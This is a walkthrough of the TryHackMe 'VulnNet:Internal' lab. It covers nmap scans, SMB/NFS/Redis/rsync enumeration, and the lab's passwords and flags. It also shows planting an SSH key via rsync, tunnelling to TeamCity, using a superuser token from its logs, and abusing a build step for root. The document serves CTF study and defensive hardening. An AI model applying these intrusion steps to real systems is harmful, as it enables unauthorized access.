VulnNet:Internal

Setup Lab

export directory=~/Documents/tryhackme/vulnnet:internal

mkdir $directory
cd $directory
mkdir recon enumeration notes
touch notes/{README.md,creds,vulns}

export IP=10.10.87.95
export URL=http://$IP
export domain=

Reconnaissance

Network Reconnaissance

This was not necessary because I had only one machine to hack, not an entire network, so I didn’t scan for hosts.

Host Enumeration

TCP Ports

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

# Nmap 7.94SVN scan initiated Wed Jun  5 06:21:55 2024 as: nmap -vvv -p 22,111,139,445,873,2049,6379,35891,47197 -sC -sV -A -T4 -oN recon/services_rustscan 10.10.87.95
Nmap scan report for 10.10.87.95
Host is up, received conn-refused (0.21s latency).
Scanned at 2024-06-05 06:22:09 CDT for 22s

PORT      STATE SERVICE     REASON  VERSION
22/tcp    open  ssh         syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
|   256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp   open  rpcbind     syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|_  100021  1,3,4      34577/tcp6  nlockmgr
139/tcp   open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp   open  rsync       syn-ack (protocol version 31)
2049/tcp  open  nfs         syn-ack 3-4 (RPC #100003)
6379/tcp  open  redis       syn-ack Redis key-value store
35891/tcp open  nlockmgr    syn-ack 1-4 (RPC #100021)
47197/tcp open  mountd      syn-ack 1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   VULNNET-INTERNA<00>  Flags: <unique><active>
|   VULNNET-INTERNA<03>  Flags: <unique><active>
|   VULNNET-INTERNA<20>  Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_clock-skew: mean: -40m01s, deviation: 1h09m16s, median: -2s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 53381/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20499/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 30401/udp): CLEAN (Failed to receive data)
|   Check 4 (port 22955/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-06-05T11:22:24
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: vulnnet-internal
|   NetBIOS computer name: VULNNET-INTERNAL\x00
|   Domain name: \x00
|   FQDN: vulnnet-internal
|_  System time: 2024-06-05T13:22:24+02:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun  5 06:22:31 2024 -- 1 IP address (1 host up) scanned in 36.08 seconds

UDP Ports

nmap -sU -sV -sC -n -F -T4 $IP -oN recon/nmap_udp

# Nmap 7.94SVN scan initiated Wed Jun  5 06:29:00 2024 as: nmap -sU -sV -sC -n -F -T4 -oN recon/nmap_udp 10.10.87.95
Warning: 10.10.87.95 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.87.95
Host is up (0.13s latency).
Not shown: 84 closed udp ports (port-unreach)
PORT      STATE         SERVICE         VERSION
53/udp    open|filtered domain
68/udp    open|filtered dhcpc
111/udp   open          rpcbind         2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100003  3           2049/udp   nfs
|   100003  3,4         2049/tcp   nfs
|   100005  1,2,3      45214/udp   mountd
|   100005  1,2,3      52767/tcp   mountd
|   100021  1,3,4      35891/tcp   nlockmgr
|   100021  1,3,4      43695/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/udp   nfs_acl
137/udp   open          netbios-ns      Samba nmbd netbios-ns (workgroup: WORKGROUP)
| nbns-interfaces: 
|   hostname: VULNNET-INTERNA
|   interfaces: 
|_    10.10.87.95
138/udp   open|filtered netbios-dgm
518/udp   open|filtered ntalk
1022/udp  open|filtered exp2
1813/udp  open|filtered radacct
2049/udp  open          nfs             3 (RPC #100003)
2222/udp  open|filtered msantipiracy
5353/udp  open          mdns            DNS-based service discovery
| dns-service-discovery: 
|   445/tcp smb
|_    Address=10.10.87.95 fe80::86:4dff:feb2:a51
9200/udp  open|filtered wap-wsp
20031/udp open|filtered bakbonenetvault
49154/udp open|filtered unknown
49181/udp open|filtered unknown
49186/udp open|filtered unknown
Service Info: Host: VULNNET-INTERNA

Host script results:
|_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun  5 06:32:59 2024 -- 1 IP address (1 host up) scanned in 239.07 seconds

Vulns

nmap --script vulners -Pn -sV -A -T4 -p- --max-retries 5 --open $IP -oN recon/nmap.vuln

Open Ports

Services

Version

ssh

OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

111

rpcbind

2-4 (RPC #100000)

139

Samba

smbd 3.X - 4.X (workgroup: WORKGROUP)

445

Samba

Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

873

rsync

(protocol version 31)

2049

nfs

(RPC #100003)

6376

redis

Redis key-value store

35891

nlockmgr

(RPC #100021)

47197

mountd

(RPC #100005)

Ports Enumeration

Samba

# list smb shares 
nmap --script "safe or smb-enum-*" -p 139,445 $IP -oN recon/nmap.smb_enum

basic enumeration

enum4linux -avA $IP -u user -p pass > enumeration/enum_4_linux

Read shares

smbclient -N -L \\\\\\\\$IP 
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	shares          Disk      VulnNet Business Shares
	IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP

Inside shares I found services.txt, data.txt and business-req.txt

NFS

port grabbing

nc -vn $IP 2049
(UNKNOWN) [10.10.87.95] 2049 (nfs) open

mounting

show

showmount -e $IP 
Export list for 10.10.87.95:
/opt/conf *

get files

sudo mount -t nfs -o vers=4 $IP:/opt/conf ./nfs

Find a password in ./nfs/redis/redis.conf —> B65Hx562F@ggAZ@F

Redis

banner grabbing

nc -vn $IP 6379                                                                        
(UNKNOWN) [10.10.87.95] 6379 (redis) open

enumeration

	nmap --script redis-info -sV -p 6379 $IP
	
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-06-05 07:18 CDT
Nmap scan report for 10.10.87.95
Host is up (0.12s latency).

PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 30.25 seconds

enumerate database

redis-cli -h $IP 
10.10.87.95:6379> auth B65Hx562F@ggAZ@F #(password found after nfs port enumeration)
OK

10.10.87.95:6379> keys 
(error) ERR wrong number of arguments for 'keys' command
10.10.87.95:6379> keys * 
1) "marketlist"
2) "tmp"
3) "authlist"
4) "internal flag"
5) "int"
10.10.87.95:6379> get internal flag
(error) ERR wrong number of arguments for 'get' command
10.10.87.95:6379> get 'internal flag'
"THM{ff8e518addbbddb74531a724236a8221}"

10.10.87.95:6379> lrange 'authlist' 0 0
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="

Rsync

enumeration

rsync --list-only rsync://$IP
files          	Necessary home interaction

get files

rsync --list-only rsync://rsync-connect@$IP/files         
Password: 
drwxr-xr-x          4,096 2021/02/01 06:51:14 .
drwxr-xr-x          4,096 2021/02/06 06:49:29 sys-internal

rsync -av rsync://rsync-connect@$IP/files/sys-internal ./rsync

Analysis & Planning

Analyse the data collected to identify potential attack vectors. Use this information to plan your penetration test, such as what tools and exploits to use.

After a lot of enumeration, I found a way to access the machine. First, I enumerated the Samba port where I found three text files, with services.txt being the first flag of this room.

The next port I enumerated was Redis, but it was a dead end because I needed credentials to authenticate to the database. So, I moved on to the NFS port.

Network File System (NFS) allows users to share mounted files in a network. This service uses TCP by default to transfer files, but you can also use UDP to improve connection speed (connectionless). After establishing the TCP socket, the NFS server checks the /etc/exports file to see if the user has permissions to access the files. I used the showmount command to search for any files that could be transferred to my local machine, and I found /etc/opt. I accessed this directory and searched for some information. I found an interesting file, ./nfs/redis/redis.conf, where I discovered the password for the Redis database.

Moving forward to the Redis port, I connected with the password and checked the available keys. I found the second flag of this room. I had some trouble with Redis because I hadn’t used it before, but after some research, I understood that these keys can be of different data types. So, to access the authlist key, I needed to use the lrange command (I included the documentation below).

Exploitation

I didn’t need to use a specific vulnerability, running a PoC to get access to this machine or develop a specific script. All I need to do is enumeration, enumeration and enumeration. I got password for database and from it I got password for rsync. Using rsync I was able to see the content of the sys-internal home directory user. To get access I upload my public key into the .ssh directory and now I can connect as sys-internal user using my private key.

Get the /files/sys-internal

rsync -av rsync://rsync-connect@$IP/files/sys-internal ./rsync

Generate keys

upload file

rsync authorized_keys rsync://rsync-connect@$IP/files/sys-internal/.ssh

connect as sys-internal

ssh sys-internal@$IP -i id_rsa

Post Exploitation

Initial Access

First thing I just search in the / directory where I found something interesting. It seems that I found a webserver who runs locally. I check the connections for both ports 80 and 8111 and looks like I found 8111 port open.

port forwarding (check ssh tunneling below)

ssh -L 8111:127.0.0.1:8111 sys-internal@$IP -i id_rsa

Now on your local machine it should run on 8111 port the webserver.

Privilege Escalation

If you open the webserver you will see a login page. I try some SQLi, but nothing, I check for methods, headers, cookies, but nothing. After a time I see that I can login as super user using a token. I search for a token in logs directory and found different tokens. I tried every one until I had success.

Now all I need to do is exploiting this webserver. I create a new project and after this I create a new build configuration

Here in Build Steps I create a new step using the command below. I set /bin/bash with SUID and now you can get root access after you execute in the ssh session.

get root privilege

Reporting

Document all discovered vulnerabilities, exploited systems, and recommended remediation strategies in a detailed report for the client. Give solution for system hardening.

Vulnerabilities

Shared files through Samba service
NFS service
Rsync → see home directory of sys-internal, can upload files
TeamCity webserver

Fixes & system Hardening

The first two aspects mentioned above aren't actually vulnerabilities. However, when using these two services, it's crucial to pay attention to privileges and what you share on the network. Similarly, Rsync isn't a vulnerability, but caution must be exercised regarding the files being shared.

During a penetration test engagement, it's essential to thoroughly examine every service discovered and assess permissions. Ensure that the /TeamCity/logs directory is not accessible to unauthorized individuals, as it could potentially lead to obtaining superuser tokens.